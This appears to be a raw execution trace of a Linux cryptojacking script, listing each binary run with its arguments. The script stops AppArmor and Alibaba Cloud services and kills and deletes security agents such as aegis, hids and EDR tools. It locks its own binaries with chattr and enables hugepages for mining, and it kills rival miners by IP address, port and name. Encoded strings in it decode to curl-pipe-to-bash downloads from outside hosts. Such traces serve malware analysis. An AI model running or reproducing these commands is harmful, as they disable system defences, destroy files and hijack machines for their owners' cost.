[systemctl --job-mode=ignore-dependencies stop apparmor.service]

/usr/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop apparmor.service]

/usr/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop apparmor.service]

/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop apparmor.service]

/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop apparmor.service]

/bin/systemctl

[systemctl disable apparmor]

/usr/sbin/service

[service aliyun.service stop]

/usr/bin/basename

[basename /usr/sbin/service]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/usr/local/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop aliyun.service.service]

/usr/local/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop aliyun.service.service]

/usr/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop aliyun.service.service]

/usr/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop aliyun.service.service]

/sbin/systemctl

[systemctl --job-mode=ignore-dependencies stop aliyun.service.service]

/bin/systemctl

[systemctl --job-mode=ignore-dependencies stop aliyun.service.service]

/bin/systemctl

[systemctl disable aliyun.service]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/bin/grep

[grep aegis]

/usr/bin/awk

[awk {print $2}]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep Yun]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs rm -rf]

/usr/bin/xargs

[xargs dirname]

/usr/bin/awk

[awk {print $11}]

/bin/grep

[grep aegis]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/local/sbin/dirname

[dirname]

/usr/local/bin/dirname

[dirname]

/usr/sbin/dirname

[dirname]

/usr/bin/dirname

[dirname]

/usr/local/sbin/rm

[rm -rf]

/usr/local/bin/rm

[rm -rf]

/usr/sbin/rm

[rm -rf]

/usr/bin/rm

[rm -rf]

/sbin/rm

[rm -rf]

/bin/rm

[rm -rf]

/usr/bin/xargs

[xargs rm -rf]

/usr/bin/xargs

[xargs dirname]

/usr/bin/awk

[awk {print $11}]

/bin/grep

[grep hids]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/local/sbin/dirname

[dirname]

/usr/local/bin/dirname

[dirname]

/usr/sbin/dirname

[dirname]

/usr/bin/dirname

[dirname]

/usr/local/sbin/rm

[rm -rf]

/usr/local/bin/rm

[rm -rf]

/usr/sbin/rm

[rm -rf]

/usr/bin/rm

[rm -rf]

/sbin/rm

[rm -rf]

/bin/rm

[rm -rf]

/usr/bin/xargs

[xargs rm -rf]

/usr/bin/xargs

[xargs dirname]

/usr/bin/awk

[awk {print $11}]

/bin/grep

[grep cloudwalker]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/local/sbin/dirname

[dirname]

/usr/local/bin/dirname

[dirname]

/usr/sbin/dirname

[dirname]

/usr/bin/dirname

[dirname]

/usr/local/sbin/rm

[rm -rf]

/usr/local/bin/rm

[rm -rf]

/usr/sbin/rm

[rm -rf]

/usr/bin/rm

[rm -rf]

/sbin/rm

[rm -rf]

/bin/rm

[rm -rf]

/usr/bin/xargs

[xargs rm -rf]

/usr/bin/xargs

[xargs dirname]

/usr/bin/awk

[awk {print $11}]

/bin/grep

[grep titanagent]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/local/sbin/dirname

[dirname]

/usr/local/bin/dirname

[dirname]

/usr/sbin/dirname

[dirname]

/usr/bin/dirname

[dirname]

/usr/local/sbin/rm

[rm -rf]

/usr/local/bin/rm

[rm -rf]

/usr/sbin/rm

[rm -rf]

/usr/bin/rm

[rm -rf]

/sbin/rm

[rm -rf]

/bin/rm

[rm -rf]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep edr]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep aegis]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep Yun]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep hids]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep edr]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep cloudwalker]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep titanagent]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep sgagent]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep barad_agent]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I {} kill -9 {}]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep hostguard]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/bin/rm

[rm -rf /usr/local/aegis]

/bin/sleep

[sleep 1]

/usr/bin/chattr

[chattr -i /usr/bin/ip6network]

/usr/bin/chattr

[chattr -i /usr/bin/kswaped]

/usr/bin/chattr

[chattr -i /usr/bin/irqbalanced]

/usr/bin/chattr

[chattr -i /usr/bin/rctlcli]

/usr/bin/chattr

[chattr -i /usr/bin/systemd-network]

/usr/bin/chattr

[chattr -i /usr/bin/pamdicks]

/usr/bin/chattr

[chattr +i /usr/bin/ip6network]

/usr/bin/chattr

[chattr +i /usr/bin/kswaped]

/usr/bin/chattr

[chattr +i /usr/bin/irqbalanced]

/usr/bin/chattr

[chattr +i /usr/bin/rctlcli]

/usr/bin/chattr

[chattr +i /usr/bin/systemd-network]

/usr/bin/chattr

[chattr +i /usr/bin/pamdicks]

/bin/sleep

[sleep 1]

/bin/rm

[rm -f /tmp/.null]

/sbin/sysctl

[sysctl -w vm.nr_hugepages=128]

/bin/grep

[grep 194.87.139.103]

/usr/bin/awk

[awk {print $7}]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep 185.71.65.238]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep 140.82.52.87]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :23]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :143]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :2222]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk -F[/] {print $1}]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :3333]

/bin/grep

[grep -v -]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :3389]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :5555]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :6666]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :6665]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :6667]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :7777]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :8444]

/bin/grep

[grep :3347]

/usr/bin/awk

[awk {print $7}]

/usr/bin/awk

[awk -F[/] {print $1}]

/bin/grep

[grep -v -]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep -v -]

/usr/bin/awk

[awk -F[/] {print $1}]

/usr/bin/awk

[awk {print $7}]

/bin/grep

[grep :10008]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep :13531]

/bin/grep

[grep -v grep]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep :3333]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/awk

[awk {print $2}]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep :5555]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep kworker -c\]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep log_]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep systemten]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep netns]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/local/sbin/kill

[kill -9 10]

/usr/local/bin/kill

[kill -9 10]

/usr/sbin/kill

[kill -9 10]

/usr/bin/kill

[kill -9 10]

/sbin/kill

[kill -9 10]

/bin/kill

[kill -9 10]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep voltuned]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep darwin]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/dl]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/ddg]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/grep

[grep /tmp/pprt]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/awk

[awk {print $2}]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/ppol]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/65ccE*]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/jmx*]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/2Ne80*]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep IOFoqIgyC0zmf2UR]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 45.76.122.92]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 51.38.191.178]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 51.15.56.161]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 86s.jpg]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep aGTSGJJp]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep nMrfmnRa]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep PuNY5tm2]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep I0r8Jyyt]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep AgdgACUD]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep uiZvwxG8]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep hahwNEdB]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep BtwXn5qH]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 3XEzey2T]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep t2tKrCSZ]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep HD7fcBgg]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep zXcDajSs]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 3lmigMo]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep AkMK4A2]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep AJ2AkKe]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep HiPxCJRS]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep http_0xCC030]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep http_0xCC031]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep http_0xCC032]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep http_0xCC033]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep C4iLM4L]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep aziplcr72qjhzvin]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk { if(substr($11,1,2)=="./" && substr($12,1,2)=="./") print $2 }]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /boot/vmlinuz]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep i4b503a52cc5]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep dgqtrcst23rtdi3ldqk322j2]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 2g0uv7npuhrlatd]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep nqscheduler]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep rkebbwgqpl4npmm]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/bin/grep

[grep ]]

/bin/grep

[grep -v grep]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/ps

[ps aux]

/bin/grep

[grep -v aux]

/usr/bin/awk

[awk $3>10.0{print $2}]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 2fhtu70teuhtoh78jc5s]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 0kwti6ut420t]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 44ct7udt0patws3agkdfqnjm]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk length($11)>19{print $2}]

/bin/grep

[grep -v _]

/bin/grep

[grep -v -]

/bin/grep

[grep -v /]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep \[^]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep rsync]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep watchd0g]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/bin/egrep

[egrep wnTKYg|2t3ik|qW3xT.2|ddg]

/usr/bin/awk

[awk {print $2}]

/usr/local/sbin/grep

[grep -E wnTKYg|2t3ik|qW3xT.2|ddg]

/usr/local/bin/grep

[grep -E wnTKYg|2t3ik|qW3xT.2|ddg]

/usr/sbin/grep

[grep -E wnTKYg|2t3ik|qW3xT.2|ddg]

/usr/bin/grep

[grep -E wnTKYg|2t3ik|qW3xT.2|ddg]

/sbin/grep

[grep -E wnTKYg|2t3ik|qW3xT.2|ddg]

/bin/grep

[grep -E wnTKYg|2t3ik|qW3xT.2|ddg]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 158.69.133.18:8220]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/java]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep gitee.com]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/java]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 104.248.4.162]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep 89.35.39.78]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /dev/shm/z3.sh]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep kthrotlds]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep ksoftirqds]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep netdns]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep watchdogs]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep kdevtmpfsi]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep kinsing]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep redis2]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep ps]

/bin/grep

[grep -v aux]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/bin/grep

[grep sync_supers]

/bin/grep

[grep -v grep]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/cut

[cut -c 9-15]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/cut

[cut -c 9-15]

/bin/grep

[grep cpuset]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep x]]

/bin/grep

[grep -v aux]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep sh] <]

/bin/grep

[grep -v aux]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep \[]]

/bin/grep

[grep -v aux]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/l.sh]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/zmcat]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep hahwNEdB]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep CnzFVPLF]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep CvKzzZLs]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep aziplcr72qjhzvin]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep /tmp/udevd]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep sustse]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep sustse3]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep wget]

/bin/grep

[grep mr.sh]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep curl]

/bin/grep

[grep mr.sh]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep wget]

/bin/grep

[grep 2mr.sh]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep curl]

/bin/grep

[grep 2mr.sh]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep wget]

/bin/grep

[grep cr5.sh]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep curl]

/bin/grep

[grep cr5.sh]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

[grep wget]

/bin/grep

[grep logo9.jpg]

/bin/grep

[grep -v grep]

/bin/ps

[ps aux]

/usr/bin/xargs

[xargs -I % kill -9 %]

/usr/bin/awk

[awk {print $2}]

/bin/grep

